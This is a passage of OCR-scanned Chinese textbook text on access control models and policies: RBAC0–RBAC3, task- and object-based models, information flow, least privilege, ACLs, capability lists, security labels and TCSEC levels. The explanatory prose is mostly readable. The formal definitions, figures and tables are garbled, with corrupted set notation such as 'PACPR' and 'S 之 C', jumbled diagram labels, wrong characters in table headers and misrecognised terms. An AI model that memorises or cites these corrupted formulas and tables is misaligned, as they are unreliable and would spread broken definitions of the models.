标 objects(OBS) 和 操作 operations(OPS))、 会 话 sessions(SESSIONS) ,如 图 5. 13 所 示 。 
USERS 可 以 是 人 、 设 备 、. 进 程 ,Permission 是 对 被 保护 目标 执行 OPS 的 许可 , UA (User 
Assignment) 是 用 户 角 色 指 派 关 系 ,PA(Permission Assignment) 是 权限 分 配 关系 ,Session_ 


RBAC0 
图 5.12 RBAC 模型 的 关系 
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User_sessions 


图 5.13 RBACo 的 控制 模型 


roles 是 会 话 激活 的 角色 关系 ,User_sessions 是 与 用 户 相 联系 的 会 话 集合 。 

用 户 是 一 个 静态 的 概念 ,会 话 则 是 一 个 动态 的 概念 ,一 次 会 话 是 用 户 的 一 个 活跃 进程 ， 
它 代 表 用 户 与 系统 交互 ,会 话 sessions 是 用 户 与 激活 的 角色 集合 之 间 的 映射 。 

用 户 、 角 色 与 许可 权 之 间 是 多 对 多 的 关系 ,用 户 被 分 配 一 定 角色 ,角色 被 分 配 一 定 的 许 
可 权 。 用 户 与 会 话 是 一 对 多 关系 ,一 个 用 户 可 同时 打开 多 个 会 话 。 一 个 会 话 构成 一 个 用 户 
到 多 个 角色 的 映射 , 即 会 话 激活 了 用 户 授权 角色 集 的 某 个 子 集 , 这 个 子 集 称 为 活跃 角色 集 。 
活跃 角色 集 决 定 了 本 次 会 话 的 许可 集 。 

基本 模型 RBAC0 形式 化 定义 如 下 : 

(1) U 表示 用 户 集 ,R 表示 角色 集 ,P 表示 权限 集 ,S 表示 会 话 集 。 

(2) PA: PXR,PACPR={(p,r) | pEP, rER}), 是 (权限 ,角色 ) 的 多 对 多 分 配 
关系 。 

(3) UA:; UXR,UACSUR={(u,r) | w€EU, rER), 是 (用 户 ,角色 ) 的 多 对 多 分 配 
关系 。 

(4) user: S 一 U, 每 一 会 话 5S; 对 应 单一 用 户 的 映射 (会 话 生存 期 间 不 变 ) 。 

(5) roles: S 一 28,roles(S) {r | (user(Si),r)EUA ) ,会 话 S; 到 角色 集合 的 映射 。 

(6) 会 话 S; 所 具有 的 权限 集合 是 Ps = U{P | (p,r)E PA} ,该 会 话 S; 所 具有 的 权限 
集合 是 与 S; 相对 应 的 角色 集中 每 一 角色 所 拥有 的 权限 的 全 体 ( 即 被 激活 的 角色 的 权限 的 
总 和 ) 。 

说 明 : session 相当 于 传统 访问 控制 中 的 subject; 管 理 U\R.P.PA、.UA 具有 的 权限 不 
在 RBAC0 定义 ,这 里 假设 只 有 安全 管理 员 才 有 权限 修改 它们 ; session 由 用 户 控制 ,允许 动 
态 激活 /取消 角色 ,实现 最 小 特权 ;应 避免 同时 激活 所 有 角色 :session 和 user 分 离 可 以 解决 
同一 用 户 多 账号 带 来 的 问题 ,如 审计 、 记 账 等 。 

4. 角色 分 层 模型 RBACI 

组 织 结构 中 通常 存在 一 种 上 、 下 级 关系 ,上 一 级 拥有 下 一 级 的 全 部 权限 。 引 入 了 一 定 的 
层次 结构 来 表现 角色 之 间 的 关系 ,这 种 表示 角色 之 间 的 层次 关系 称 为 角色 层次 。 

角色 分 层 把 角色 组 织 起 来 ,能够 很 自然 地 反映 一 个 组 织 内 部 人 员 之 间 的 职权 和 责任 关 
系 , 层 次 之 间 存 在 高 对 低 的 继承 关系 , 即 父 角色 可 以 继承 子 角色 的 许可 。 角 色 分 层 的 优点 是 
当主 体 发 生变 化 时 ,只 需 修改 主体 与 角色 之 间 的 关联 ,而 不 必修 改 角色 与 客体 的 关联 。 

角色 分 层 模型 RBAC1 继承 了 RBAC0 的 所 有 特性 ,在 RBAC0O 的 基础 上 增加 了 角色 层 
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RH 
(Role Hierarchy) 


User_sessions 


图 5.14 RBACI 的 控制 模型 


RBAC1 定义 了 角色 之 间 的 关系 ,如 偏 序 (Partial Orders)、 自 反 (Reflexive)、 传 递 
(Transitive) 和 反对 称 (Anti-Symmetric) 。 在 RBAC0 的 基础 上 还 定义 了 角色 的 继承 关系 : 

role r2 "inherits" role rl 

表示 角色 rl 的 权限 同样 是 r2 的 权限 。 

角色 分 层 形成 角色 层次 级 别 , 高 级 别 的 角色 继承 低级 别 角色 的 权限 , 且 高 级 别 的 角色 还 
可 以 另外 具有 一 些 权限 。 为 了 限制 继承 ,RBAC1 还 定义 了 私有 角色 (Private Roles) 。 分 层 
角色 的 例子 如 图 5.15 和 图 5. 16 所 示 。 


Production Quality Production Quality Director 
Engineerl Engineerl Engineer2 Engineer2 


BW \ Project Leadl Project Lead2 
Engineerl Engineer2 
Quality Production Quality Production 
Engineering Dept Engineer2 ~ Engineer2 Engineerl Engineerl 
(a) 树 (b) 倒置 的 树 


图 5.15 分 层 角色 的 例子 


Director 


Project Leadl Project Lead2 


Quality Production Quality Production 
Engineer2 Engineer2 Engineerl Engineerl 


Engineerl Engineer2 


Engineering Dept 
图 5.16 分 层 角色 的 例子 (c) 格 状 


RBAC1 的 形式 化 定义 如 下 : 
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(1) UR.P、S、.PA.UA 和 user: SU 的 含义 与 RBACO 相同 。 

(2) RHCRXR 是 集合 R 上 的 偏 序 关系 , 称 为 角色 层次 或 支配 关系 。 

(3) roles:S 一 2*( 会 话 到 角色 集合 的 映射 ): 

roles(S:) ER’, R’={r| Ir rH(user(S),r) EUA) 

其 中 集合 R' 表 示 激 活 会 话 S; 的 用 户 user(S;) 所 拥有 的 角色 集合 中 ,每 一 角色 所 覆盖 的 
所 有 角色 的 并 集合 ,roles(S;) 是 该 集合 的 子 集 。 

(4) 会 话 S; 所 具有 的 权限 是 Ps =U{P1| 3r<<r 且 (p,r) € PA), 即 对 于 roles(S;) 
中 的 每 一 个 角色 , 求 出 它 所 覆盖 的 每 一 个 角色 的 权限 集 ,然后 求 并 集 , 即 为 S; 所 具有 的 权 
限 集 。 

5. 角色 约束 模型 RBAC2 

角色 约束 模型 RBAC2 在 RBACO0 的 基础 上 增加 了 约束 概念 ,对 用 户 到 角色 的 指派 和 权 
限 到 角色 的 指派 加 以 限制 。RBAC2 比 RBAC0 增加 了 责任 分 离 , 用 于 解决 利益 的 冲突 , 防 
止 用 户 超越 权限 。 

职责 分 离 使 用 约束 条 件 (Constraints) 机 制 ,定义 了 全 程 限 制 或 同一 场合 限制 的 互 斥 角 
色 (Multually Exclusive Roles)、 基 数 约 束 (Cardinality Constraints )、 先 决 约束 
(Prerequisite) ,会 话 约束 (Constraints in Session) ,等 级 约束 (Hierarchy Constraints) 等 约 
束 条 件 机 制 。 

职责 分 离 是 保障 安全 的 一 个 基本 原则 ,是 指 有 些许 可 不 能 同时 被 同一 用 户 获得 ,以 避免 
安全 上 的 漏洞 ,分 为 静态 职责 分 离 (Static Separation of Duty Relations，SSD) 和 动态 职责 
分 离 (Dynamic Separation of Duty Relations，DSD) 两 种 。 

静态 职责 分 离 只 有 当 一 个 角色 与 用 户 所 属 的 其 他 角色 彼此 不 互 斥 时 ,这 个 角色 才能 授 
权 给 该 用 户 ,如 图 5. 17 所 示 。 动 态 职责 分 离 只 有 当 一 个 角色 与 一 主体 的 任何 一 个 当前 活跃 
角色 都 不 互 斥 时 该 角色 才能 成 为 该 主体 的 另 一 个 活跃 角色 。 角 色 的 职责 分 离 也 称 为 角色 互 
斥 , 是 角色 限制 的 一 种 ,例如 收 款 员 、 出 纳 员 、 审 计 员 应 由 不 同 的 用 户 担 任 。 


图 5.17 RBAC2 的 SSD 控制 模型 


角色 基数 约束 是 指 系统 组 织 中 有 一 些 角色 只 能 由 一 定 人 数 的 用 户 占用 ,在 创建 新 的 角 
色 时 ,通过 指定 角色 的 基数 来 限定 该 角色 可 以 拥有 的 最 大 授权 用 户 数 。 如 总 经 理 角 色 只 能 
由 一 位 用 户 担任 。 

SSD RBAC2 模型 对 用 户 分 配 的 角色 进行 约束 ,也 就 是 当 用 户 被 分 配给 一 个 角色 时 , 禁 
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止 其 成 为 第 二 个 角色 。SSD 定义 了 一 个 用 户 角色 分 配 的 约束 关系 ,一 个 用 户 不 可 能 同时 分 
配 SSD 中 的 两 个 角色 。 

DSD RBAC2 模型 约束 定义 与 SSD 类 似 。 要 限制 一 个 用 户 的 许可 权 ,SSD 直接 在 用 户 
的 许可 空间 进行 约束 ,而 DSD 通过 对 用 户 会 话 过 程 进行 约束 。DSD 对 最 小 特权 提供 支持 ， 
用 户 在 不 同 的 时 间 拥有 不 同 的 权限 ;允许 用 户 被 授予 不 产生 利益 冲突 的 多 个 角色 。 

6. 统一 模型 RBAC3 

统一 模型 RBAC3 组 合 了 RBAC1 和 RBAC2 模型 ,同时 提供 角色 层次 和 约束 机 制 。 由 
于 传递 性 ,也 间接 地 包含 了 RBAC0 统一 模型 。 如 图 5. 18 所 示 ,具体 说 明 请 参考 其 他 资料 。 


(Permission) 


Constraints 


(Session)™ 


图 5.18 RBAC3 控制 模型 及 其 家 族 


7.RBAC 特点 

RBAC 具有 如 下 特点 : 

(1) RBAC 访问 控制 模型 易于 被 非 技 术 的 管理 者 理解 ,容易 制定 安全 策略 ;同时 也 易于 
映射 到 访问 控制 矩阵 或 基于 组 的 策略 陈述 。 

(2) RBAC 同时 具有 基于 身份 策略 的 特征 ,也 具有 基于 规则 的 策略 的 特征 。 

(3) 在 基于 组 或 角色 的 访问 控制 中 ,一 个 个 人 用 户 可 能 是 不 只 一 个 组 或 角色 的 成 员 , 有 
时 又 可 能 有 所 限制 。 

(4) RBAC 便于 授权 管理 ,如 系统 管理 员 需 要 修改 系统 设置 等 内 容 时 ,必须 有 几 个 不 同 
角色 的 用 户 到 场 方 能 操作 ,从 而 保证 了 安全 性 。 

(5) RBAC 便于 根据 工作 需要 分 级 ,如 企业 财务 部 门 与 非 财力 部 门 的 员工 对 企业 财务 
的 访问 权 就 可 由 财务 人 员 这 个 角色 来 区 分 。 

(6) RBAC 便于 赋予 最 小 特权 ,如 即使 用 户 被 赋予 高 级 身份 时 也 未 必 一 定 要 使 用 ,以 便 
减少 损失 。 只 有 必要 时 方 能 拥有 特权 。 

(7) RBAC 便于 任务 分 担 , 不 同 的 角色 完成 不 同 的 任务 。 

(8) RBAC 便于 文件 分 级 管理 ,文件 本 身 也 可 分 为 不 同 的 角色 ,如 信件 ,账单 等 ,由 不 同 
角色 的 用 户 拥有 。 


5.2.4 基于 任务 的 访问 控制 模型 
DAC、MAC 和 RBAC 都 是 静态 模型 ,未 考虑 系统 执行 的 上 下 文 环境 ,主体 可 以 无 限制 
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地 执行 所 拥有 的 权限 ,没有 时 限 性 ,无 法 实现 对 工作 流 的 访问 控制 。 为 了 解决 随 着 任务 的 执 
行 而 进行 动态 授权 的 安全 保护 问题 ,提出 了 基于 任务 的 访问 控制 模型 (Task-Based Access 
Control Model, TBAC) 。TBAC 模型 是 从 应 用 和 企业 层 角 度 来 解决 安全 问题 ,以 面向 任务 
的 观点 .从 任务 (活动 ) 的 角度 来 建立 安全 模型 和 实现 安全 机 制 ,在 任务 处 理 的 过 程 中 提供 动 
态 实 时 的 安全 管理 。 

TBAC 模型 由 工作 流 .授权 结 构 体 .受托 人 集 和 许可 集 4 部 分 组 成 ,如 图 5. 19 所 示 。 在 
TBAC 中 ,对 象 的 访问 权限 控制 并 不 是 静止 不 变 的 ,而 是 随 着 执行 任务 的 上 下 文 环境 发 生 
变化 。 在 工作 流 环境 中 ,数据 的 处 理 与 上 一 次 的 处 理 相 关联 ,相应 的 访问 控制 也 如 此 ,因而 


TBAC 是 一 种 上 下 文 相关 的 访问 控制 模型 。 
Protection States . : 


Revoke 


Assign 
execution 
Limit 


Work flow 


AU2 AU Invoke 。 AU 


Authorization Unit) 
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Complete/ 
invalid 


图 5.19 TBAC 模型 


AU4 AU5 


TBAC 不 仅 能 对 不 同 工 作 流 实 行 不 同 的 访问 控制 策略 ,而 且 还 能 对 同一 工作 流 的 不 同 
任务 实例 实行 不 同 的 访问 控制 策略 。TBAC 是 基于 任务 的 ,这 也 表明 TBAC 是 一 种 基于 实 
例 (Instance-Based) 的 访问 控制 模型 。TBAC 从 工作 流 中 的 任务 角度 建 模 , 可 以 依据 任务 和 
任务 状态 的 不 同 对 权限 进行 动态 管理 。 

TBAC 非常 适合 分 布 式 计算 和 多 点 访问 控制 的 信息 处 理 控制 以 及 在 工作 流 、 分 布 式 处 
理 和 事务 管理 系统 中 的 决策 制定 。 


5.2.5 基于 对 象 的 访问 控制 模型 


当 用 户 数量 多 、 处 理 的 信息 数据 量 巨大 、 数 据 类 型 差异 较 大 时 ,需要 用 专门 的 系统 和 专 
门 的 人 员 加 以 处 理 。RBAC 模型 除了 维护 用 户 和 角色 的 关联 关系 外 ,还 需要 将 庞大 的 信息 
资源 访问 权限 赋予 有 限 个 角色 ,用户 权限 的 管理 任务 将 变 得 十 分 繁重 ,并 且 用 户 权限 难以 维 
护 ,降低 了 系统 的 安全 性 和 可 靠 性 。 

当 信息 资源 的 种 类 增加 或 减少 时 ,安全 管理 员 必 须 更 新 所 有 角色 的 访问 权限 设置 。 如 
果 受 控 对 象 的 属性 发 生变 化 ,同时 需要 将 受 控 对 象 不 同属 性 的 数据 分 配给 不 同 的 访问 主体 
处 理 时 ,安全 管理 员 将 不 得 不 增加 新 的 角色 ,并且 还 必须 更 新 原来 所 有 角色 的 访问 权限 设置 
以 及 访问 主体 的 角色 分 配 设置 ,这 样 的 访问 控制 需求 变化 往往 是 不 可 预知 的 ,造成 访问 控制 
管理 的 难度 和 工作 量 巨大 。 在 这 种 情况 下 ,有 必要 引入 基于 受 控 对 象 的 访问 控制 模型 。 

基于 对 象 的 访问 控制 模型 (Objectrbased Access Control Model, OBAC) 的 控制 策略 和 
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控制 规则 是 OBAC 访问 控制 系统 的 核心 所 在 。 

在 OBAC 模型 中 ,将 访问 控制 列表 与 受 控 对 象 或 受 控 对 象 的 属性 相关 联 ,并 将 访问 控 
制 选项 设计 成 为 用 户 组 或 角色 及 其 对 应 权限 的 集合 ;允许 对 策略 和 规则 进行 重用 继承 和 
派生 操作 ;不 仅 可 以 对 受 控 对 象 本 身 进行 访问 控制 , 受 控 对 象 的 属性 也 可 以 进行 访问 控制 ， 
而 且 派生 对 象 可 以 继承 父 对 象 的 访问 控制 设置 ,这 对 于 信息 量 巨大 、 信 息 内 容 更 新 变化 频繁 
的 管理 信息 系统 非常 有 益 ,可 以 减轻 由 于 信息 资源 的 派生 、 演 化 和 重组 等 带 来 的 分 配 、 设 定 
角色 权限 等 的 工作 量 。 

OBAC 以 受 控 对 象 的 角度 ,将 访问 主体 的 访问 权限 直接 与 受 控 对 象 相关 联 ,定义 对 象 
的 访问 控制 列表 ,增删 、 修 改 访问 控制 项 易于 操作 , 当 受 控 对 象 的 属性 发 生 改 变 , 或 受 控 对 
象 发 生 继承 和 派生 时 ,无 须 更 新 访问 主体 的 权限 ,只 要 修改 受 控 对 象 的 相应 访问 控制 项 即 
可 ,减少 了 访问 主体 的 权限 管理 ,降低 了 授权 数据 管理 的 复杂 性 。 

OBAC 从 信息 系统 的 数据 差异 变化 和 用 户 需求 出 发 ,解决 了 信息 数据 量 大 、 数 据 种 类 
繁多 ,数据 更 新 变化 频繁 的 大 型 管理 信息 系统 的 安全 管理 。 


5.2.6 信息 流 模型 


从 安全 模型 所 控制 的 对 象 来 看 ,一般 有 两 种 不 同 的 方法 来 建立 安全 模型 ,除了 访问 控制 
模型 外 还 有 信息 流 模型 。 

信息 流 模型 主要 着 眼 于 对 客体 之 间 的 信息 传输 过 程 的 控制 ,通过 对 信息 流向 的 分 析 可 
以 发 现 系统 中 存在 的 隐蔽 通道 ,并 设法 予以 堵塞 。 隐 项 通道 就 是 指 系 统 中 非 正常 使 用 的 、 不 
受 强制 访问 控制 正规 保护 的 通信 方式 。 隐 项 通道 的 存在 显然 危及 系统 敏感 信息 的 保护 。 

信息 流 是 信息 根据 某 种 因果 关系 的 流动 ,信息 流 总 是 从 旧 状态 的 变量 流向 新 状态 的 变 
量 。 信 息 流 模型 的 出 发 点 是 彻底 切断 系统 中 信息 流 的 隐蔽 通道 ,防止 对 信息 的 窃取 。 

信息 流 模型 需要 遵守 的 安全 规则 是 在 系统 状态 转换 时 ,信息 流 只 能 从 访问 级 别 低 的 状 
态 流向 访问 级 别 高 的 状态 。 

信息 流 模 型 实现 的 关键 在 于 对 系统 的 描述 , 即 对 模型 进行 彻底 的 信息 流 分 析 , 找 出 所 有 
的 信息 流 , 并 根据 信息 流 安全 规则 判断 其 是 否 为 异常 流 。 若 是 异常 流 就 反复 修改 系统 的 描 
述 或 模型 ,直到 所 有 的 信息 流 都 不 是 异常 流 为 止 。 

信息 流 模型 是 一 种 基于 事件 或 踪迹 的 模型 ,其 焦点 是 系统 用 户 可 见 的 行为 。 现 有 的 信 
息 流 模型 无 法 直接 指出 哪 种 内 部 信息 流 是 被 允许 的 , 哪 种 是 不 被 允许 的 ,因此 在 实际 系统 中 
的 实现 和 验证 中 没有 太 多 的 帮助 和 指导 。 


5.3 访问 控制 的 安全 策略 


安全 策略 是 指 在 某 个 安全 区 域内 (通常 是 指 属于 某 个 组 织 的 一 系列 处 理 和 通信 资源 )， 
用 于 所 有 与 安全 相关 活动 的 一 套 控制 规则 。 这 些 规则 是 由 此 安全 区 域 的 一 个 安全 权力 机 构 
建立 的 ,并 由 安全 控制 机 构 来 描述 实施 或 实现 。 

针对 不 同 的 访问 控制 模型 会 有 不 同 的 安全 控制 策略 ,访问 控制 安全 策略 的 制定 应 该 符 
合 安全 原则 ,如 最 小 特权 原则 、 最 小 泄露 原则 和 多 级 安全 策略 等 。 常 用 的 访问 控制 安全 策略 
有 基于 身份 的 安全 策略 和 基于 规则 的 安全 策略 。 
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1. 安全 策略 建立 的 需要 和 目的 

安全 的 领域 广泛 繁杂 ,构建 一 个 可 以 抵御 风险 的 安全 框架 涉及 很 多 细节 。 如 果 能 够 提 
供 一 种 恰当 的 、 符 合 安全 需求 的 整体 思路 ,就 会 使 这 个 问题 容易 得 多 ,也 更 加 有 明确 的 前 进 
方向 。 能 够 提供 这 种 帮助 的 就 是 安全 策略 。 

安全 策略 关注 的 核心 是 最 高 决策 层 认 为 必须 值得 注意 的 那些 方面 。 概 括 地 说 ,一 种 安 
全 策略 实质 上 表明 : 当 设 计 所 涉及 的 那个 系统 在 进行 操作 时 ,必须 明确 在 安全 领域 的 范围 
内 ,什么 操作 是 明确 允许 的 ,什么 操作 是 一 般 默认 允许 的 ,什么 操作 是 明确 不 允许 的 ,什么 操 
作 是 默认 不 允许 的 。 

建立 安全 策略 是 实现 安全 的 最 首要 工作 ,也 是 实现 安全 技术 管理 与 规范 的 第 一 步 。 安 
全 策略 的 制定 实施 是 围绕 主体 .客体 和 安全 控制 规则 集 三 者 之 间 的 关系 展开 的 ,其 原则 是 最 
小 特权 原则 、 最 小 泄露 原则 和 多 级 安全 策略 。 

最 小 特权 原则 是 指 主体 执行 操作 时 ,按照 主体 所 需 权 利 的 最 小 化 原则 分 配给 主体 权 
力 。 最 小 特权 原则 的 优点 是 最 大 限度 地 限制 了 主体 实施 授权 行为 ,可 以 避免 来 自 突 发 事 
件 、 错 误 和 未 授权 使 用 的 危险 。 也 就 是 说 ,主体 只 能 被 允许 执行 必须 的 操作 ,其 他 操作 禁 
止 授权 。 

最 小 泄露 原则 是 指 主体 执行 任务 时 ,按照 主体 所 需要 知道 的 信息 最 小 化 的 原则 分 配给 
主体 权力 。 

多 级 安全 策略 是 指 主体 和 客体 间 的 数据 流向 和 权限 控制 按照 安全 级 别 的 绝密 (T) 、 秘 
密 (S) ,机 密 (C) ,限制 (RS) 和 无 级 别 (U)5 级 来 划分 。 多 级 安全 策略 的 优点 是 避免 敏感 信 
息 的 扩散 。 具 有 安全 级 别 的 信息 资源 ,只 有 安全 级 别 比 它 高 的 主体 才能 够 访问 。 

2. 基于 身份 的 安全 策略 

访问 控制 的 安全 策略 的 两 种 实现 方式 是 基于 身份 的 安全 策略 和 基于 规则 的 安全 策略 。 
中 国 国 家 标准 ISO 7498-2 一 1989 中 OSI 安全 体系 结构 中 定义 两 种 安全 策略 建立 的 基础 是 
授权 行为 。 基 于 身份 的 安全 策略 一 般 用 于 DAC 安全 控制 ,基于 规则 的 安全 策略 一 般 用 于 
MAC 安全 控制 。 

基于 身份 的 安全 策略 (Identification-Based Access Control Policies,IDBACP) 与 鉴别 行 
为 一 致 ,目的 在 于 过 滤 对 数据 或 资源 的 访问 ,只 有 能 通过 认证 的 那些 主体 才 有 可 能 正常 使 用 
客体 的 资源 。 基 于 身份 的 策略 包括 基于 个 人 的 策略 和 基于 组 的 策略 。 

基于 身份 的 安全 策略 按照 被 授权 访问 的 信息 为 访问 者 所 拥有 ,还 是 被 访问 数据 的 一 部 
分 而 定 , 有 两 种 实现 方法 : 能 力 表 CL 和 访问 控制 列表 ACL。 

(1) 基于 个 人 的 策略 。 基 于 个 人 的 策略 (Individual-Based Access Control Policies， 
IDLBACP) 是 指 以 用 户 为 中 心 建立 的 一 种 策略 ,这 种 策略 由 一 些 列表 组 成 ,这 些 列表 限定 了 
针对 特定 的 客体 ,哪些 用 户 可 以 实现 何 种 策略 操作 行为 。 

如 表 5. 2 所 示 , 对 文件 2 而 言 ,授权 用 户 B 有 只 读 的 权利 ,授权 用 户 A 则 被 允许 读 和 
写 ;对 授权 用 户 N 而 言 , 具 有 对 文件 1.2 和 文件 N 的 读 写 权利 。 该 策略 例子 的 实施 默认 使 
用 了 最 小 特权 原则 ,对 于 授权 用 户 B, 只 具有 读 文 件 2 的 权利 。 

(2) 基于 组 的 策略 。 基 于 组 的 策略 (Group-Based Access Control Policies,GBACP) 是 
基于 个 人 策略 的 扩充 , 指 一 组 用 户 被 允许 使 用 同样 的 访问 控制 规则 访问 同样 的 客体 。 
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表 5.2 基于 个 人 的 策略 示例 


权限 
文件 1 文件 2 和 文件 N 
授权 用 户 
授权 用 户 A(X) 读 写 读 写 读 写 
授权 用 户 B 读 
授权 用 户 N(X) 读 写 读 写 读 写 


表 5. 3 中 ,授权 用 户 A 对 文件 1 有 读 和 写 的 权利 ,授权 用 户 N 同样 被 允许 对 文件 1 读 
和 写 。 对 于 文件 1 而 言 ,A 和 N 基于 同样 的 授权 规则 ;对 于 所 有 的 文件 而 言 , 从 文件 1.2 到 
N', 授 权 用 户 A 和 N 都 基于 同样 的 授权 规则 ,那么 A 和 N 可 以 组 成 一 个 用 户 组 G。 基 于 角 
色 的 策略 实际 上 是 基于 组 的 策略 的 扩充 。 


表 5.3 基于 组 的 策略 示例 


权限 
突 件 并 文件 2 二 文件 N 
授权 用 户 
授权 用 户 B 读 
授权 用 户 组 G 
授权 用 户 NCX) 读 写 读 写 读 写 
授权 用 户 ACX) 


3. 基于 规则 的 安全 策略 

基于 规则 的 安全 策略 中 的 授权 依赖 于 敏感 性 。 在 一 个 安全 系统 中 ,数据 或 资源 标注 安 
全 标记 ,代表 用 户 进行 活动 的 进程 可 以 得 到 与 其 原 发 者 相应 的 安全 标记 。 根 据 安全 需求 和 
授权 原则 制定 相应 的 安全 控制 规则 ,系统 根据 安全 规则 进行 访问 授权 。 

基于 规则 的 安全 策略 在 实现 上 ,由 系统 通过 比较 用 户 的 安全 级 别 和 客体 资源 的 安全 级 
别 来 判断 是 否 允 许 用 户 进行 访问 。 


5.4 访问 控制 的 实现 


实现 访问 的 控制 要 保证 授权 用 户 使 用 的 权限 与 其 所 拥有 的 权限 对 应 ,制止 非 授 权 用 户 
的 非 授权 行为 。 通 常用 户 访问 信息 资源 (文件 或 是 数据 库 ), 可 能 的 行为 有 读 、 写 和 管理 ,用 
Read 或 R 表示 读 操 作 , Write 或 W 表示 写 操 作 ,Own 或 O 表示 管理 操作 。 将 管理 操作 从 
读 写 中 分 离 出 来 ,是 因为 管理 员 也 许 会 对 控制 规则 本 身 或 是 文件 的 属性 等 做 修改 ,也 就 是 修 
改 访问 控制 表 。 

1. 访问 控制 矩阵 

访问 控制 矩阵 (Access Control Matrix，ACM) 是 通过 矩阵 形式 表示 访问 控制 规则 和 授 
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权 用 户 权 限 的 方法 ,如 表 5.4 所 示 。 特 权 用 户 或 特权 用 户 组 可 以 修改 主体 的 访问 控制 权限 。 
访问 控制 矩阵 的 实现 很 易于 理解 ,但 是 查找 和 实现 起 来 有 一 定 的 难度 。 如 果 用 户 和 文件 系 
统 要 管理 的 文件 很 多 ,那么 控制 矩阵 将 会 成 几何 级 数 增 长 ,这样 对 于 增长 的 矩阵 而 言 ,会 
大 量 的 空余 空间 。 


表 5.4 访问 控制 矩阵 权限 表 


权限 
文件 1 文件 2 5 文件 NN 
授权 用 户 
授权 用 户 A OwnRW 
授权 用 户 B R 
授权 用 户 N RW OwnRW 
2. 访问 控制 表 


访问 控制 表 (Access Control Lists，ACLs) 是 以 文件 或 资源 为 中 心 建立 的 访问 权限 表 。 
目前 ,大 多 数 PC 服务 器 都 使 用 ACLs 作为 访问 控制 的 实现 机 制 。 访 问 控制 表 的 优点 在 于 
实现 简单 ,任何 得 到 授权 的 主体 都 可 以 有 一 个 访问 表 。 实 现 如 图 5. 20 所 示 。 


File 1 ACLs Al ACLs Bl 
ACLs 文 件 UserAl =| UserAl UserB1 UserX1 
子 权限 表 1 Read Read On 
Wi Wi Read 
UserXl rite rite Write 
迷 二 中 
FileN 
子 权限 表 N “| UserAn 


UserXn 


图 5.20 访问 控制 表 的 实现 


授权 用 户 Al 的 访问 控制 规则 存储 在 文件 Filel 中 ,Al 的 访问 规则 可 以 由 Al 下 面 的 
权限 表 ACLsAl 来 确定 ,权限 表 限 定 了 用 户 UserAl 的 访问 权限 。 

3. 访问 控制 能 力 列表 

能 力 是 访问 控制 中 的 一 个 重要 概念 , 它 是 指 请 求 访问 的 发 起 者 所 拥有 的 一 个 有 效 标签 
(Ticket) , 它 授 权 标签 表明 的 持 有 者 可 以 按照 何 种 访问 方式 访问 特定 的 客体 。 访 问 控制 能 
力 表 (Access Control Capabilitis Lists，ACCLs) 是 以 用 户 为 中 心 建立 访问 权限 表 。 实 现 如 
图 5.21 所 示 。 

访问 控制 能 力 表 的 Filel 表明 了 授权 用 户 UserA 对 文件 Filel 的 访问 权限 ,UserAF 表 
明了 UserA 对 文件 系统 的 访问 控制 规则 集 。 因 此 ,ACCLs 的 实现 与 ACLs 正好 相反 。 

定义 能 力 的 重要 作用 在 于 能 力 的 特殊 性 ,如 果 赋 予 哪 个 主体 具有 一 种 能 力 ,事实 上 是 说 
明了 这 个 主体 具有 了 一 定 对 应 的 权限 。 能 力 的 实现 有 两 种 方式 , 即 传递 的 和 不 可 传递 的 。 
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User AF ACCLsF1 ACCLsF2 


ACCLs 文 件 File 1 -| Filel File 2 File N 
User A : Read Read Own 
Wi Wi Read 
File N ne "ie Write 
中 中 


User XF 
UserX | | Fill 


i 
-一 


图 5.21 访问 控制 能 力 表 的 实现 


一 些 能 力 可 以 由 主体 传递 给 其 他 主体 使 用 , 另 一 些 则 不 能 。 能 力 的 传递 由 授权 实现 。 

4. 访问 控制 安全 标签 列表 

访问 控制 安全 标签 列表 是 限定 一 个 用 户 对 一 个 客体 目标 访问 的 安全 属性 集合 。 安 全 标 
签 是 限制 和 附属 在 主体 或 客体 上 的 一 组 安全 属性 信息 。 安 全 标签 的 含义 比 能 力 更 为 广泛 和 
严格 , 它 实 际 上 还 建立 了 一 个 严格 的 安全 等 级 集合 ,能 对 敏感 信息 加 以 区 分 。 安 全 标签 列表 
可 以 对 用 户 和 客体 资源 强制 执行 安全 策略 。 

访问 控制 标签 列表 的 实现 如 表 5.5 所 示 。 左 侧 为 用 户 对 应 的 安全 级 别 , 右 侧 为 文件 系 
统 对 应 的 安全 级 别 。 假 设 请 求 访问 的 用 户 UserA 的 安全 级 别 为 S, 那 么 UserA 请 求 访 问 文 
件 File2 时 ,由 于 ST, 访问 会 被 拒绝 ; 当 UserA 请 求 访 问 文件 FileN 时 ,因为 S 之 C, 所 以 


允许 访问 。 
表 5.5 安全 标签 列表 
用 六 安全 级 别 交 :大 安全 级 别 
UserA S Filel S 
UserB € File2 T 
User X T FileN © 


5. 访问 控制 实现 的 安全 级 别 

访问 控制 系统 实现 的 安全 级 别 和 计算 机 系统 的 安全 级 别 一 致 ,分 为 D.C(C1、C2)、B 
(Bl1、B2、B3)、A 级。 

D 级 别 是 最 低 的 安全 级 别 , 对 系统 提供 最 小 的 安全 防护 。 系 统 的 访问 控制 没有 限制 ,无 
须 登 录 系 统 就 可 以 访问 数据 。 

C 级 中 ,C1l 级 称 为 选择 性 保护 级 (Discrtionary Security Protection) ,可 以 实现 自主 安全 
防护 ,对 用 户 和 数据 的 分 离 ,保护 或 限制 用 户 权 限 的 传播 。C2 级 具有 访问 控制 环境 的 权力 ， 
比 C1 的 访问 控制 划分 的 更 为 详细 ,能 够 实现 受 控 安 全 保护 .个 人 账户 管理 .审计 和 资源 
隔离 。 

C 级 别 属于 自由 选择 性 安全 保护 ,可 对 主体 行为 进行 审计 与 约束 。C 级 别 的 安全 策略 
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主要 是 自主 存 取 控制 。C 级 别 的 用 户 必须 提供 身份 证 明 ( 比 如 口令 机 制 ), 用 户 的 操作 与 审 
计 自 动 关联 。 

C 级 别 的 审计 能 够 针对 实现 访问 控制 的 授权 用 户 和 非 授权 用 户 ,建立 ,维护 以 及 保护 审 
计 记 录 不 被 更 改 、 破 坏 或 受到 非 授权 存 取 , 审 计 验 证 生命 周期 ,检查 是 否 有 明显 的 旁 路 可 绕 
过 或 欺骗 系统 的 非法 操作 。 

B 级 别 包 括 Bl1、B2 和 B3 三 个 级 别 ,B 级 别 能 够 提供 强制 性 安全 保护 和 多 级 安全 。 强 制 
防护 是 指定 义 及 保持 标记 的 完整 性 ,信息 资源 的 拥有 者 不 具有 更 改 自 身 的 权限 ,系统 数据 完 
全 处 于 访问 控制 管理 的 监督 下 。B 安全 级 别 可 以 实现 自主 存 取 控制 和 强制 存 取 控制 ,所 有 
